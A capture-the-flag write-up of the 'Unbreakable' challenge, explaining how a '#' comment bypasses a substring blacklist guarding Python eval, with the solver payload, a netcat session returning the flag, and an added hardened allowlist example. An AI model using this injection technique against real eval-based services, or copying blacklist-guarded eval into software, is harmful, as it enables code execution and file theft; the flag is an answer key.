Unbreakable
Think you can escape my grasp? Challenge accepted! I dare you to try and break free, but beware, it won’t be easy. I’m ready for whatever tricks you have up your sleeve!
Writeup by: Stig Rune Grønnestad
Recon
The challenge is a Python script, so let’s take a look at it.
# Substrings that are rejected anywhere in the input.
blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%',
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's',
              'lower', 'upper', 'system', '}', '{' ]

# banner1 and banner2 are not shown in this excerpt.
while True:
    ans = input('Break me, shake me!\n\n$ ').strip()
    if any(char in ans for char in blacklist):
        print(f'\n{banner1}\nNaughty naughty..\n')
    else:
        try:
            # The input is evaluated with '()' appended to it.
            eval(ans + '()')
            print('WHAT WAS THAT?!\n')
        except:
            print(f"\n{banner2}\nI'm UNBREAKABLE!\n")
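The script reads a line of input and checks whether it contains any of the substrings in the blacklist. If it does, it prints Naughty naughty... If it doesn’t, the script appends () to the input and passes the result to eval, and if that fails, it prints I'm UNBREAKABLE!. Because () is appended, the input is meant to be a function name without parentheses… or maybe we can comment it out? The blacklist does not contain #, the parentheses, the single quote, the comma or the dot, so a complete call followed by # passes the filter and turns the appended () into a comment.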
Solver
print(open('flag.txt','r').read())#
Executing
└─$ nc 94.237.59.119 59639
Break me, shake me!
$ print(open('flag.txt','r').read())#
HTB{3v4l_0r_3vuln??}
WHAT WAS THAT?!
Break me, shake me!
$
Flag
HTB{3v4l_0r_3vuln??}
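Why the filter fails and what a fix looks like, as an added example that is not part of the original writeup or the challenge code: it replays the blacklist check on the solver input, uses ast to show what eval would run without running it, and contrasts that with an exact-match allowlist that never calls eval. The command names hello and whoami and all function names are assumptions.

```python
import ast

# Blacklist copied from the challenge script above.
BLACKLIST = [';', '"', 'os', '_', '\\', '/', '`', ' ', '-', '!', '[', ']',
             '*', 'import', 'eval', 'banner', 'echo', 'cat', '%', '&', '>',
             '<', '+', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0',
             'b', 's', 'lower', 'upper', 'system', '}', '{']

# Solver input from the writeup.
PAYLOAD = "print(open('flag.txt','r').read())#"

# Hypothetical commands the service is meant to offer (assumption).
ALLOWED = {'hello': lambda: 'hello', 'whoami': lambda: 'guest'}


def passes_blacklist(ans):
    """The challenge's filter: True when no blacklisted substring occurs."""
    return not any(tok in ans for tok in BLACKLIST)


def evaluated_shape(ans):
    """Describe what eval(ans + '()') would run, without running it."""
    try:
        node = ast.parse(ans + '()', mode='eval').body
    except SyntaxError:
        return 'syntax error'
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
        return f'call to {node.func.id} with {len(node.args)} argument(s)'
    return type(node).__name__


def safe_dispatch(ans):
    """Hardened handler: exact-match lookup in an allowlist, no eval."""
    handler = ALLOWED.get(ans.strip())
    if handler is None:
        raise ValueError('unknown command')
    return handler()


if __name__ == '__main__':
    print(passes_blacklist(PAYLOAD))   # filter lets the input through
    print(evaluated_shape(PAYLOAD))    # the appended () is inside a comment
    print(safe_dispatch('hello'))      # allowlisted command still works
    try:
        safe_dispatch(PAYLOAD)
    except ValueError as exc:
        print('rejected:', exc)
```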